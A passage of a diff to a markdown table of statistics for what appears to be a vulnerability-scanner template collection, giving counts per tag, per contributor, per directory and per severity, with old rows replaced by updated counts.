medium | 1413 | dns | 17 | +| wordpress | 923 | daffainfo | 787 | workflows | 191 | high | 1412 | | | +| xss | 837 | pikpikcu | 353 | network | 119 | critical | 888 | | | +| exposure | 820 | pussycat0x | 298 | ssl | 27 | low | 234 | | | +| wp-plugin | 807 | pdteam | 283 | dns | 17 | unknown | 31 | | | +| osint | 675 | ritikchaddha | 275 | headless | 10 | | | | | +| tech | 637 | ricardomaia | 226 | javascript | 2 | | | | | +| lfi | 614 | theamanrawat | 221 | cves.json | 1 | | | | | +| edb | 598 | geeknik | 221 | TEMPLATES-STATS.json | 1 | | | | | +| misconfig | 536 | r3y3r53 | 196 | contributors.json | 1 | | | | | +| rce | 522 | 0x_akoko | 179 | | | | | | | +| packetstorm | 504 | princechaddha | 161 | | | | | | | +| cve2021 | 468 | gy741 | 153 | | | | | | | +| wpscan | 465 | sleepingbag945 | 132 | | | | | | | +| cve2022 | 456 | arafatansari | 119 | | | | | | | +| wp | 388 | tess | 109 | | | | | | | +| unauth | 343 | madrobot | 65 | | | | | | | +| authenticated | 321 | zzeitlin | 64 | | | | | | | +| file | 319 | idealphase | 63 | | | | | | | +| sqli | 293 | akincibor | 58 | | | | | | | +| cve2023 | 270 | pdresearch | 57 | | | | | | | +| intrusive | 265 | for3stco1d | 55 | | | | | | | +| cve2020 | 253 | righettod | 55 | | | | | | | +| token-spray | 242 | iamnoooob | 48 | | | | | | | +| kev | 239 | philippedelteil | 46 | | | | | | | +| top-200 | 212 | gaurang | 42 | | | | | | | +| osint-social | 210 | edoardottt | 41 | | | | | | | +| config | 207 | rootxharsh | 41 | | | | | | | +| oast | 205 | c-sh0 | 35 | | | | | | | +| | 195 | j4vaovo | 32 | | | | | | | +| token | 194 | adam crosser | 31 | | | | | | | +| default-login | 179 | luisfelipe146 | 31 | | | | | | | +| login | 175 | johnk3r | 28 | | | | | | | +| iot | 163 | ice3man | 26 | | | | | | | +| apache | 158 | pwnhxl | 25 | | | | | | | +| cve2018 | 158 | organiccrap | 24 | | | | | | | +| cve2019 | 156 | hardik-solanki | 24 | | | | | | | +| detect | 147 | techbrunchfr | 23 | | | | | | | +| joomla | 146 | harsh | 23 | | | | | | | +| malware | 131 | ffffffff0x | 22 | | | | | | | +| redirect | 124 | ctflearner | 21 | | | | | | | | cve2010 | 112 | sullo | 18 | | | | | | | -| top-100 | 100 | cckuailong | 18 | | | | | | | -| files | 100 | parthmalhotra | 16 | | | | | | | -| cve2023 | 99 | sheikhrishad | 15 | | | | | | | -| router | 97 | ctflearner | 15 | | | | | | | -| network | 96 | random-robbie | 15 | | | | | | | -| ssrf | 96 | pr3r00t | 15 | | | | | | | -| cms | 95 | milo2012 | 14 | | | | | | | -| auth-bypass | 79 | r3dg33k | 14 | | | | | | | -| cve2017 | 77 | theabhinavgaur | 13 | | | | | | | -| devops | 77 | tenbird | 13 | | | | | | | -| takeover | 73 | melbadry9 | 13 | | | | | | | -| intrusive | 72 | 0ri2n | 13 | | | | | | | -| install | 70 | sharath | 13 | | | | | | | -| disclosure | 68 | suman_kar | 12 | | | | | | | -| oracle | 65 | lu4nx | 12 | | | | | | | -| seclists | 60 | elsfa7110 | 11 | | | | | | | -| oss | 57 | dogasantos | 11 | | | | | | | -| cve2015 | 54 | wdahlenb | 11 | | | | | | | -| cisco | 53 | cyllective | 11 | | | | | | | -| google | 53 | logicalhunter | 10 | | | | | | | -| cve2016 | 52 | hackergautam | 10 | | | | | | | -| detect | 51 | nadino | 10 | | | | | | | -| adobe | 50 | alph4byt3 | 10 | | | | | | | -| fileupload | 50 | meme-lord | 10 | | | | | | | +| auth-bypass | 111 | cckuailong | 18 | | | | | | | +| network | 110 | parthmalhotra | 17 | | | | | | | +| cve2017 | 108 | shaikhyaser | 16 | | | | | | | +| cms | 107 | 0xpugazh | 16 | | | | | | | +| ssrf | 104 | random-robbie | 16 | | | | | | | +| files | 104 | lu4nx | 16 | | | | | | | +| router | 102 | sheikhrishad | 15 | | | | | | | +| top-100 | 100 | pr3r00t | 15 | | | | | | | +| install | 85 | r3dg33k | 14 | | | | | | | +| disclosure | 84 | tenbird | 14 | | | | | | | +| devops | 82 | milo2012 | 14 | | | | | | | +| takeover | 74 | 0ri2n | 13 | | | | | | | +| seclists | 72 | sharath | 13 | | | | | | | +| fileupload | 69 | nullfuzz | 13 | | | | | | | +| oracle | 66 | melbadry9 | 13 | | | | | | | +| oss | 65 | theabhinavgaur | 13 | | | | | | | +| cisco | 59 | suman_kar | 12 | | | | | | | +| huntr | 58 | meme-lord | 12 | | | | | | | +| cve2015 | 56 | dogasantos | 12 | | | | | | | +| adobe | 55 | elsfa7110 | 11 | | | | | | | +| google | 54 | rxerium | 11 | | | | | | | +| cve2016 | 54 | wdahlenb | 11 | | | | | | | +| tokens | 52 | cyllective | 11 | | | | | | | +| atlassian | 49 | co5mos | 10 | | | | | | | +| log4j | 46 | nadino | 10 | | | | | | | +| tenable | 46 | alph4byt3 | 10 | | | | | | | | logs | 46 | random_robbie | 10 | | | | | | | -| tenable | 46 | co5mos | 10 | | | | | | | -| osint-gaming | 45 | emadshanab | 9 | | | | | | | -| vmware | 45 | nullfuzz | 9 | | | | | | | -| atlassian | 45 | 0xpugazh | 9 | | | | | | | -| debug | 44 | fabaff | 9 | | | | | | | -| aem | 44 | 0x240x23elu | 9 | | | | | | | -| vulhub | 44 | oppsec | 9 | | | | | | | -| plugin | 43 | veshraj | 8 | | | | | | | -| cve2014 | 42 | aashiq | 8 | | | | | | | -| osint-porn | 42 | olearycrew | 8 | | | | | | | -| osint-hobby | 42 | iamthefrogy | 8 | | | | | | | -| hackerone | 42 | harsh | 8 | | | | | | | -| huntr | 40 | zh | 8 | | | | | | | -| traversal | 37 | _0xf4n9x_ | 8 | | | | | | | -| generic | 37 | that_juan_ | 8 | | | | | | | -| jira | 36 | caspergn | 7 | | | | | | | -| springboot | 36 | techryptic (@tech) | 7 | | | | | | | -| osint-misc | 35 | amit-jd | 7 | | | | | | | -| aws | 35 | harshbothra_ | 7 | | | | | | | -| kubernetes | 35 | randomstr1ng | 7 | | | | | | | -| injection | 34 | kophjager007 | 7 | | | | | | | -| listing | 33 | leovalcante | 7 | | | | | | | -| deserialization | 31 | its0x08 | 7 | | | | | | | -| sap | 29 | divya_mudgal | 7 | | | | | | | -| osint-coding | 29 | dr_set | 7 | | | | | | | -| osint-tech | 28 | adamcrosser | 7 | | | | | | | -| log4j | 28 | me_dheeraj | 7 | | | | | | | +| vmware | 45 | hackergautam | 10 | | | | | | | +| osint-gaming | 45 | logicalhunter | 10 | | | | | | | +| hackerone | 44 | emadshanab | 9 | | | | | | | +| aem | 44 | fabaff | 9 | | | | | | | +| vulhub | 44 | 0x240x23elu | 9 | | | | | | | +| debug | 44 | oppsec | 9 | | | | | | | +| jndi | 43 | olearycrew | 9 | | | | | | | +| c2 | 43 | momika233 | 9 | | | | | | | +| cve2014 | 43 | aashiq | 8 | | | | | | | +| plugin | 42 | irshad ahamed | 8 | | | | | | | +| osint-porn | 42 | iamthefrogy | 8 | | | | | | | +| osint-hobby | 42 | veshraj | 8 | | | | | | | +| generic | 41 | zh | 8 | | | | | | | +| traversal | 39 | that_juan_ | 8 | | | | | | | +| springboot | 39 | _0xf4n9x_ | 8 | | | | | | | +| oa | 38 | mastercho | 8 | | | | | | | +| cnvd | 37 | noraj | 8 | | | | | | | +| jira | 37 | randomstr1ng | 7 | | | | | | | +| deserialization | 36 | divya_mudgal | 7 | | | | | | | +| listing | 36 | caspergn | 7 | | | | | | | +| aws | 36 | leovalcante | 7 | | | | | | | +| misc | 35 | dr_set | 7 | | | | | | | +| osint-misc | 35 | its0x08 | 7 | | | | | | | +| kubernetes | 35 | harshbothra_ | 7 | | | | | | | +| injection | 35 | me_dheeraj | 7 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| cnvd | 28 | forgedhallpass | 6 | | | | | | | -| gitlab | 27 | pentest_swissky | 6 | | | | | | | -| misc | 26 | puzzlepeaches | 6 | | | | | | | -| php | 26 | xelkomy | 6 | | | | | | | -| microsoft | 26 | ja1sh | 6 | | | | | | | -| fuzz | 25 | justaacat | 6 | | | | | | | -| jndi | 25 | imnightmaree | 6 | | | | | | | -| proxy | 25 | clem9669 | 6 | | | | | | | -| firewall | 24 | evan rubinstein | 6 | | | | | | | -| osint-shopping | 24 | gitlab red team | 6 | | | | | | | -| osint-images | 24 | nodauf | 6 | | | | | | | -| api | 24 | pathtaga | 6 | | | | | | | -| cve2012 | 24 | devang-solanki | 6 | | | | | | | +| php | 34 | huta0 | 7 | | | | | | | +| ir | 33 | adamcrosser | 7 | | | | | | | +| osint-tech | 31 | kophjager007 | 7 | | | | | | | +| osint-coding | 30 | amit-jd | 7 | | | | | | | +| sap | 29 | techryptic (@tech) | 7 | | | | | | | +| gitlab | 28 | bhutch | 6 | | | | | | | +| fuzz | 28 | evan rubinstein | 6 | | | | | | | +| microsoft | 28 | pentest_swissky | 6 | | | | | | | +| api | 27 | clem9669 | 6 | | | | | | | +| wp-theme | 27 | nodauf | 6 | | | | | | | +| cve2012 | 26 | forgedhallpass | 6 | | | | | | | +| k8s | 26 | xelkomy | 6 | | | | | | | +| firewall | 25 | __fazal | 6 | | | | | | | +| weaver | 25 | pathtaga | 6 | | | | | | | +| proxy | 25 | devang-solanki | 6 | | | | | | | +| osint-shopping | 24 | justaacat | 6 | | | | | | | | osint-finance | 24 | praetorian-thendrickson | 6 | | | | | | | -| manageengine | 24 | __fazal | 6 | | | | | | | -| osint-business | 24 | robotshell | 5 | | | | | | | -| zoho | 23 | prajiteshsingh | 5 | | | | | | | -| k8s | 23 | vicrack | 5 | | | | | | | -| amazon | 23 | kh4sh3i | 5 | | | | | | | -| wp-theme | 22 | r12w4n | 5 | | | | | | | -| ibm | 21 | joanbono | 5 | | | | | | | -| cloud | 21 | yanyun | 5 | | | | | | | -| tomcat | 21 | ganofins | 5 | | | | | | | -| c2 | 21 | s0obi | 5 | | | | | | | -| msf | 21 | defr0ggy | 5 | | | | | | | -| weblogic | 21 | panch0r3d | 5 | | | | | | | -| cicd | 20 | mr-xn | 5 | | | | | | | -| fortinet | 20 | podalirius | 5 | | | | | | | -| camera | 19 | h1ei1 | 4 | | | | | | | -| dlink | 19 | tanq16 | 4 | | | | | | | -| github | 19 | r3naissance | 4 | | | | | | | -| ssl | 19 | dadevel | 4 | | | | | | | -| jenkins | 19 | 3th1c_yuk1 | 4 | | | | | | | -| struts | 19 | dolev farhi | 4 | | | | | | | -| dns | 19 | powerexploit | 4 | | | | | | | -| service | 18 | scent2d | 4 | | | | | | | -| lfr | 18 | wisnupramoedya | 4 | | | | | | | -| ftp | 18 | e_schultze_ | 4 | | | | | | | -| admin | 18 | incogbyte | 4 | | | | | | | -| osint-music | 18 | shine | 4 | | | | | | | -| wavlink | 18 | yash anand @yashanand155 | 3 | | | | | | | -| ir | 17 | k0pak4 | 3 | | | | | | | -| cve2011 | 17 | sushantkamble | 3 | | | | | | | -| osint-blog | 16 | alifathi-h1 | 3 | | | | | | | -| nginx | 16 | huowuzhao | 3 | | | | | | | -| cve2009 | 16 | f1tz | 3 | | | | | | | -| printer | 16 | jarijaas | 3 | | | | | | | -| xxe | 16 | kazet | 3 | | | | | | | -| backup | 16 | true13 | 3 | | | | | | | -| status | 15 | binaryfigments | 3 | | | | | | | -| cve2008 | 15 | swissky | 3 | | | | | | | -| android | 15 | ambassify | 3 | | | | | | | -| hp | 15 | vsh00t | 3 | | | | | | | -| citrix | 15 | fyoorer | 3 | | | | | | | -| magento | 15 | lucasljm2001 | 3 | | | | | | | -| osint-art | 14 | unstabl3 | 3 | | | | | | | -| zyxel | 14 | johnjhacking | 3 | | | | | | | -| jboss | 14 | me9187 | 3 | | | | | | | -| cve2013 | 14 | thomas_from_offensity | 3 | | | | | | | -| woocommerce | 14 | badboycxcc | 3 | | | | | | | -| nodejs | 14 | matt galligan | 3 | | | | | | | -| domainmod | 14 | 0w4ys | 3 | | | | | | | -| osint-health | 14 | bhutch | 3 | | | | | | | -| java | 14 | lark-lab | 3 | | | | | | | -| confluence | 14 | z3bd | 3 | | | | | | | -| mail | 14 | dudez | 3 | | | | | | | -| audit | 14 | splint3r7 | 3 | | | | | | | -| laravel | 13 | canberbamber | 3 | | | | | | | -| abstractapi | 13 | ekrause | 3 | | | | | | | -| creds-stuffing | 13 | davidmckennirey | 3 | | | | | | | -| fortigate | 13 | hahwul | 3 | | | | | | | -| cuppa | 13 | mastercho | 3 | | | | | | | -| osint-dating | 13 | shifacyclewala | 3 | | | | | | | -| login-check | 13 | taielab | 3 | | | | | | | -| osint-political | 13 | whoever | 3 | | | | | | | -| azure | 13 | _generic_human_ | 3 | | | | | | | -| dashboard | 12 | cheesymoon | 3 | | | | | | | -| auth | 12 | atomiczsec | 3 | | | | | | | -| microweber | 12 | mavericknerd | 3 | | | | | | | -| kafka | 12 | andydoering | 3 | | | | | | | -| rails | 12 | evergreencartoons | 3 | | | | | | | -| git | 12 | bernardofsr | 3 | | | | | | | -| netsweeper | 12 | vagnerd | 3 | | | | | | | -| drupal | 12 | ph33r | 3 | | | | | | | -| enum | 12 | yuzhe-zhang-0 | 3 | | | | | | | -| grafana | 12 | arcc | 3 | | | | | | | -| vpn | 12 | arm!tage | 3 | | | | | | | -| webserver | 12 | skeltavik | 3 | | | | | | | -| backdoor | 12 | emenalf | 3 | | | | | | | -| ruby | 12 | fxploit | 3 | | | | | | | -| netgear | 12 | dr0pd34d | 3 | | | | | | | -| graphql | 12 | impramodsargar | 3 | | | | | | | -| airflow | 12 | kishore-hariram | 2 | | | | | | | -| ruijie | 12 | nkxxkn | 2 | | | | | | | -| sonicwall | 11 | joeldeleep | 2 | | | | | | | -| online-fire-reporting | 11 | israel comazzetto dos reis | 2 | | | | | | | -| docker | 11 | myztique | 2 | | | | | | | -| npm | 11 | c3l3si4n | 2 | | | | | | | -| coldfusion | 11 | 0xsapra | 2 | | | | | | | -| cnvd2021 | 11 | coldfish | 2 | | | | | | | -| cisa | 11 | 0xnirvana | 2 | | | | | | | -| osint-video | 11 | d4vy | 2 | | | | | | | -| phpmyadmin | 11 | 0xrudra | 2 | | | | | | | -| setup | 11 | amsda | 2 | | | | | | | -| xstream | 11 | convisoappsec | 2 | | | | | | | -| jolokia | 10 | n-thumann | 2 | | | | | | | -| glpi | 10 | kre80r | 2 | | | | | | | -| spring | 10 | thardt-praetorian | 2 | | | | | | | -| django | 10 | m4lwhere | 2 | | | | | | | -| dedecms | 10 | dheerajmadhukar | 2 | | | | | | | -| dell | 10 | brenocss | 2 | | | | | | | -| bypass | 10 | gevakun | 2 | | | | | | | -| headless | 10 | hackerarpan | 2 | | | | | | | -| symfony | 10 | maximus decimus | 2 | | | | | | | -| ssh | 10 | korteke | 2 | | | | | | | -| solarview | 10 | geekby | 2 | | | | | | | -| ssti | 10 | bing0o | 2 | | | | | | | -| digitalocean | 10 | redteambrasil | 2 | | | | | | | -| db | 10 | y4er | 2 | | | | | | | -| zimbra | 10 | 0xsmiley | 2 | | | | | | | -| kube | 9 | k11h-de | 2 | | | | | | | -| opencats | 9 | megamansec | 2 | | | | | | | -| vcenter | 9 | kiblyn11 | 2 | | | | | | | -| windows | 9 | nvn1729 | 2 | | | | | | | -| redis | 9 | clarkvoss | 2 | | | | | | | -| osint-news | 9 | dogancanbakir | 2 | | | | | | | -| scada | 9 | socketz | 2 | | | | | | | -| installer | 9 | paradessia | 2 | | | | | | | -| gitea | 9 | uomogrande | 2 | | | | | | | -| cache | 9 | dbrwsky | 2 | | | | | | | -| firebase | 9 | ehsahil | 2 | | | | | | | -| wso2 | 9 | sinkettu | 2 | | | | | | | -| prometheus | 9 | wa1tf0rme | 2 | | | | | | | -| thinkphp | 9 | 8arthur | 2 | | | | | | | -| sitecore | 9 | heeress | 2 | | | | | | | -| versa | 9 | bsysop | 2 | | | | | | | -| zabbix | 9 | z0ne | 2 | | | | | | | -| iis | 9 | joshlarsen | 2 | | | | | | | -| fastjson | 9 | moritz nentwig | 2 | | | | | | | -| pfsense | 9 | ricardo maia (brainfork) | 2 | | | | | | | -| mirai | 8 | manas_harsh | 2 | | | | | | | -| metadata | 8 | martincodes-de | 2 | | | | | | | -| druid | 8 | dahse89 | 2 | | | | | | | -| unauthenticated | 8 | udit_thakkur | 2 | | | | | | | -| config-audit | 8 | bp0lr | 2 | | | | | | | -| jetbrains | 8 | lum8rjack | 2 | | | | | | | -| spotweb | 8 | randomrobbie | 2 | | | | | | | -| cnvd2020 | 8 | nybble04 | 2 | | | | | | | -| vbulletin | 8 | lotusdll | 2 | | | | | | | -| elasticsearch | 8 | pxmme1337 | 2 | | | | | | | -| emerge | 8 | 0xprial | 2 | | | | | | | -| default-page | 8 | j3ssie | 2 | | | | | | | -| crlf | 8 | ree4pwn | 2 | | | | | | | -| smtp | 8 | rafaelwdornelas | 2 | | | | | | | -| bucket | 8 | raesene | 2 | | | | | | | -| console | 8 | g4l1t0 | 2 | | | | | | | -| ecology | 8 | joshua rogers | 2 | | | | | | | -| solr | 8 | thezakman | 2 | | | | | | | -| ognl | 8 | github.com/its0x08 | 2 | | | | | | | -| oauth | 8 | notnotnotveg | 2 | | | | | | | -| hms | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| exchange | 8 | koti2 | 2 | | | | | | | -| cisco-switch | 8 | hetroublemakr | 2 | | | | | | | -| recon | 8 | cocxanh | 2 | | | | | | | -| icewarp | 8 | v0idc0de | 2 | | | | | | | -| atom | 8 | danielmofer | 2 | | | | | | | -| ofbiz | 7 | codexlynx | 2 | | | | | | | -| nagios | 7 | 0xcrypto | 2 | | | | | | | -| seeyon | 7 | cckuakilong | 2 | | | | | | | -| error | 7 | afaq | 2 | | | | | | | -| blind | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| shopify | 7 | vavkamil | 2 | | | | | | | -| malware | 7 | 0xelkomy | 2 | | | | | | | -| samsung | 7 | streetofhackerr007 | 2 | | | | | | | -| squirrelmail | 7 | mohammedsaneem | 2 | | | | | | | -| manager | 7 | shelled | 2 | | | | | | | -| nagiosxi | 7 | paperpen | 2 | | | | | | | -| websphere | 7 | parth | 2 | | | | | | | -| gogs | 7 | smaranchand | 2 | | | | | | | -| go | 7 | foulenzer | 2 | | | | | | | -| avtech | 7 | sy3omda | 2 | | | | | | | -| fortios | 7 | bananabr | 2 | | | | | | | -| huawei | 7 | zomsop82 | 2 | | | | | | | -| maps | 7 | luci | 2 | | | | | | | -| ec2 | 7 | nuk3s3c | 2 | | | | | | | -| vms | 7 | supras | 2 | | | | | | | -| sophos | 7 | 666asd | 2 | | | | | | | -| odoo | 7 | w4cky_ | 2 | | | | | | | -| slack | 6 | gal nagli | 2 | | | | | | | -| jamf | 6 | x1m_martijn | 2 | | | | | | | -| moodle | 6 | sbani | 2 | | | | | | | -| minio | 6 | sascha brendel | 2 | | | | | | | -| opensis | 6 | ajaysenr | 2 | | | | | | | -| nexus | 6 | randomdhiraj | 2 | | | | | | | -| solarwinds | 6 | brucelsone | 2 | | | | | | | -| elfinder | 6 | micha3lb3n | 1 | | | | | | | -| fpd | 6 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| artica | 6 | ahmed sherif | 1 | | | | | | | -| plesk | 6 | kaizensecurity | 1 | | | | | | | -| lucee | 6 | w0tx | 1 | | | | | | | -| magmi | 6 | mesaglio | 1 | | | | | | | -| database | 6 | rivalsec | 1 | | | | | | | -| mongodb | 6 | akash.c | 1 | | | | | | | -| pmb | 6 | pdp | 1 | | | | | | | -| rconfig | 6 | sinsinology | 1 | | | | | | | -| s3 | 6 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| keycloak | 6 | secthebit | 1 | | | | | | | -| doctor-appointment-system | 6 | ndmalc | 1 | | | | | | | -| microstrategy | 6 | juliosmelo | 1 | | | | | | | -| symantec | 6 | topscoder | 1 | | | | | | | -| bigip | 6 | ph33rr | 1 | | | | | | | -| activemq | 6 | dale clarke | 1 | | | | | | | -| newrelic | 6 | brabbit10 | 1 | | | | | | | -| leak | 6 | mass0ma | 1 | | | | | | | -| python | 6 | omarjezi | 1 | | | | | | | -| kubelet | 6 | x6263 | 1 | | | | | | | -| jeecg | 6 | affix | 1 | | | | | | | -| jetty | 6 | metascan | 1 | | | | | | | -| openvpn | 6 | alperenkesk | 1 | | | | | | | -| filemanager | 6 | freakyclown | 1 | | | | | | | -| node | 6 | vinit989 | 1 | | | | | | | -| cobbler | 6 | ipanda | 1 | | | | | | | -| liferay | 6 | duty_1g | 1 | | | | | | | -| zhiyuan | 6 | higor melgaço (eremit4) | 1 | | | | | | | -| typo3 | 5 | tea | 1 | | | | | | | -| rseenet | 5 | mukundbhuva | 1 | | | | | | | -| apisix | 5 | xstp | 1 | | | | | | | -| elastic | 5 | gboddin | 1 | | | | | | | -| adminer | 5 | skylark-lab | 1 | | | | | | | -| rfi | 5 | elitebaz | 1 | | | | | | | -| hybris | 5 | imhunterand | 1 | | | | | | | -| cockpit | 5 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| circarlife | 5 | sickwell | 1 | | | | | | | -| awstats | 5 | elouhi | 1 | | | | | | | -| nacos | 5 | shelld3v | 1 | | | | | | | -| gocd | 5 | kr1shna4garwal | 1 | | | | | | | -| storage | 5 | evan rubinstien | 1 | | | | | | | -| firmware | 5 | lingtren | 1 | | | | | | | -| strapi | 5 | mah3sec_ | 1 | | | | | | | -| avaya | 5 | keni0k | 1 | | | | | | | -| hikvision | 5 | berkdusunur | 1 | | | | | | | -| parallels | 5 | mariam tariq | 1 | | | | | | | -| sql | 5 | nytr0gen | 1 | | | | | | | -| ruckus | 5 | blckraven | 1 | | | | | | | -| geoserver | 5 | ramondunker | 1 | | | | | | | -| resin | 5 | hardik-rathod | 1 | | | | | | | -| square | 5 | allenwest24 | 1 | | | | | | | -| heroku | 5 | iampritam | 1 | | | | | | | -| facebook | 5 | noamrathaus | 1 | | | | | | | -| akamai | 5 | arjunchandarana | 1 | | | | | | | -| metinfo | 5 | realexp3rt | 1 | | | | | | | -| server | 5 | lixts | 1 | | | | | | | -| caucho | 5 | liquidsec | 1 | | | | | | | -| microfocus | 5 | elder tao | 1 | | | | | | | -| hashicorp | 5 | y0no | 1 | | | | | | | -| tikiwiki | 5 | jaskaran | 1 | | | | | | | -| fatpipe | 5 | ynnirc | 1 | | | | | | | -| prestashop | 5 | patrick pirker | 1 | | | | | | | -| kkfileview | 5 | ofjaaah | 1 | | | | | | | -| 74cms | 5 | 0xceba | 1 | | | | | | | -| avideo | 5 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| vrealize | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| cacti | 5 | couskito | 1 | | | | | | | -| paypal | 5 | sleepingbag945 | 1 | | | | | | | -| carrental | 5 | thelicato | 1 | | | | | | | -| openemr | 5 | lrtk-coder | 1 | | | | | | | -| alibaba | 5 | sec_hawk | 1 | | | | | | | -| telesquare | 4 | andysvints | 1 | | | | | | | -| webmin | 4 | marcos_iaf | 1 | | | | | | | -| mailchimp | 4 | tirtha_mandal | 1 | | | | | | | -| log | 4 | zy9ard3 | 1 | | | | | | | -| stored | 4 | zhenwarx | 1 | | | | | | | -| httpserver | 4 | tehtbl | 1 | | | | | | | -| roxy | 4 | nagli | 1 | | | | | | | -| centos | 4 | barthy.koeln | 1 | | | | | | | -| stripe | 4 | houdinis | 1 | | | | | | | -| mikrotik | 4 | shivampand3y | 1 | | | | | | | -| oa | 4 | dmartyn | 1 | | | | | | | -| grav | 4 | danigoland | 1 | | | | | | | -| cve2005 | 4 | wabafet | 1 | | | | | | | -| panos | 4 | aringo | 1 | | | | | | | -| cnvd2019 | 4 | ayadi | 1 | | | | | | | -| asp | 4 | co0nan | 1 | | | | | | | -| royalevent | 4 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| churchcrm | 4 | undefl0w | 1 | | | | | | | -| pie-register | 4 | dk999 | 1 | | | | | | | -| cve2007 | 4 | mhdsamx | 1 | | | | | | | -| voip | 4 | zinminphy0 | 1 | | | | | | | -| ems | 4 | ptonewreckin | 1 | | | | | | | -| bmc | 4 | amnotacat | 1 | | | | | | | -| artifactory | 4 | ramkrishna sawant | 1 | | | | | | | -| powerjob | 4 | hexcat | 1 | | | | | | | -| postmessage | 4 | narluin | 1 | | | | | | | -| horde | 4 | aayush vishnoi | 1 | | | | | | | -| openfire | 4 | vzamanillo | 1 | | | | | | | -| consul | 4 | ransomsec | 1 | | | | | | | -| mlflow | 4 | fq_hsu | 1 | | | | | | | -| tenda | 4 | 0h1in9e | 1 | | | | | | | -| gnuboard | 4 | remonsec | 1 | | | | | | | -| zend | 4 | rojanrijal | 1 | | | | | | | -| ebs | 4 | harshinsecurity | 1 | | | | | | | -| mautic | 4 | yashgoti | 1 | | | | | | | -| telerik | 4 | alevsk | 1 | | | | | | | -| beyondtrust | 4 | therealtoastycat | 1 | | | | | | | -| puppet | 4 | alexrydzak | 1 | | | | | | | -| dropbear | 4 | lark lab | 1 | | | | | | | -| osint-archived | 4 | jas37 | 1 | | | | | | | -| mysql | 4 | lethargynavigator | 1 | | | | | | | -| candidats | 4 | yuansec | 1 | | | | | | | -| jellyfin | 4 | aresx | 1 | | | | | | | -| aspose | 4 | petergrifin | 1 | | | | | | | -| mostra | 4 | ling | 1 | | | | | | | -| xmlrpc | 4 | petruknisme | 1 | | | | | | | -| sangfor | 4 | dwbzn | 1 | | | | | | | -| tokens | 4 | davidfegyver | 1 | | | | | | | -| nosqli | 4 | shreyapohekar | 1 | | | | | | | -| kibana | 4 | higor melgaço | 1 | | | | | | | -| hongdian | 4 | dawid-czarnecki | 1 | | | | | | | -| arcgis | 4 | wlayzz | 1 | | | | | | | -| pixie | 4 | aaronchen0 | 1 | | | | | | | -| linkerd | 4 | screamy | 1 | | | | | | | -| aura | 4 | ohlinge | 1 | | | | | | | -| nextjs | 4 | exid | 1 | | | | | | | -| seagate | 4 | majidmc2 | 1 | | | | | | | -| spark | 4 | evolutionsec | 1 | | | | | | | -| httpd | 4 | makyotox | 1 | | | | | | | -| flink | 4 | tirtha | 1 | | | | | | | -| elementor | 4 | willd96 | 1 | | | | | | | -| search | 4 | charanrayudu | 1 | | | | | | | -| sonarqube | 4 | af001 | 1 | | | | | | | -| yeswiki | 4 | ayadim | 1 | | | | | | | -| codeigniter | 4 | supr4s | 1 | | | | | | | -| wcs | 4 | nielsing | 1 | | | | | | | -| dolibarr | 4 | philippdelteil | 1 | | | | | | | -| froxlor | 4 | shockwave | 1 | | | | | | | -| couchdb | 4 | piyushchhiroliya | 1 | | | | | | | -| kevinlab | 4 | luqman | 1 | | | | | | | -| zte | 4 | 8authur | 1 | | | | | | | -| pentaho | 4 | zeyad azima | 1 | | | | | | | -| photo | 4 | breno_css | 1 | | | | | | | -| phpinfo | 4 | kabirsuda | 1 | | | | | | | -| concrete | 4 | s1r1u5_ | 1 | | | | | | | -| javascript | 4 | remi gascou (podalirius) | 1 | | | | | | | -| tls | 4 | kchason | 1 | | | | | | | -| ldap | 4 | b4uh0lz | 1 | | | | | | | -| thinkcmf | 4 | thevillagehacker | 1 | | | | | | | -| axigen | 4 | bjhulst | 1 | | | | | | | -| springcloud | 4 | viondexd | 1 | | | | | | | -| bitbucket | 4 | 0xtavian | 1 | | | | | | | -| terramaster | 4 | kiransau | 1 | | | | | | | -| sendgrid | 4 | bad5ect0r | 1 | | | | | | | -| age-encryption | 4 | queencitycyber | 1 | | | | | | | -| prtg | 4 | jbaines-r7 | 1 | | | | | | | -| redmine | 4 | 0xceeb | 1 | | | | | | | -| kentico | 4 | ggranjus | 1 | | | | | | | -| phppgadmin | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | -| rabbitmq | 4 | d0rkerdevil | 1 | | | | | | | -| jupyter | 4 | rschio | 1 | | | | | | | -| ampache | 4 | absshax | 1 | | | | | | | -| express | 4 | arr0way | 1 | | | | | | | -| mostracms | 4 | pjborah | 1 | | | | | | | -| hpe | 4 | kareemse1im | 1 | | | | | | | -| umbraco | 4 | spac3wh1te | 1 | | | | | | | -| newstatpress | 4 | iphantasmic | 1 | | | | | | | -| goanywhere | 4 | xeldax | 1 | | | | | | | -| hoteldruid | 4 | kagamigawa | 1 | | | | | | | -| cloudflare | 4 | rodnt | 1 | | | | | | | -| xerox | 3 | palanichamy_perumal | 1 | | | | | | | -| shiro | 3 | jc175 | 1 | | | | | | | -| voipmonitor | 3 | exceed | 1 | | | | | | | -| sony | 3 | noobexploiter | 1 | | | | | | | -| spip | 3 | revblock | 1 | | | | | | | -| smb | 3 | rotemreiss | 1 | | | | | | | -| axway | 3 | luqmaan hadia | 1 | | | | | | | -| metabase | 3 | fopina | 1 | | | | | | | -| subrion | 3 | william söderberg @ withsecure | 1 | | | | | | | -| digitalrebar | 3 | mr. bobo hp | 1 | | | | | | | -| targa | 3 | qlkwej | 1 | | | | | | | -| ansible | 3 | florianmaak | 1 | | | | | | | -| webadmin | 3 | michael wedl | 1 | | | | | | | -| magnolia | 3 | push4d | 1 | | | | | | | -| nortek | 3 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| angular | 3 | sshell | 1 | | | | | | | -| ivanti | 3 | flag007 | 1 | | | | | | | -| backdrop | 3 | phyr3wall | 1 | | | | | | | -| circleci | 3 | b0yd | 1 | | | | | | | -| webmail | 3 | lamscun | 1 | | | | | | | -| asus | 3 | zandros0 | 1 | | | | | | | -| payara | 3 | miryangjung | 1 | | | | | | | -| fileman | 3 | xcapri | 1 | | | | | | | -| matrix | 3 | shifacyclewla | 1 | | | | | | 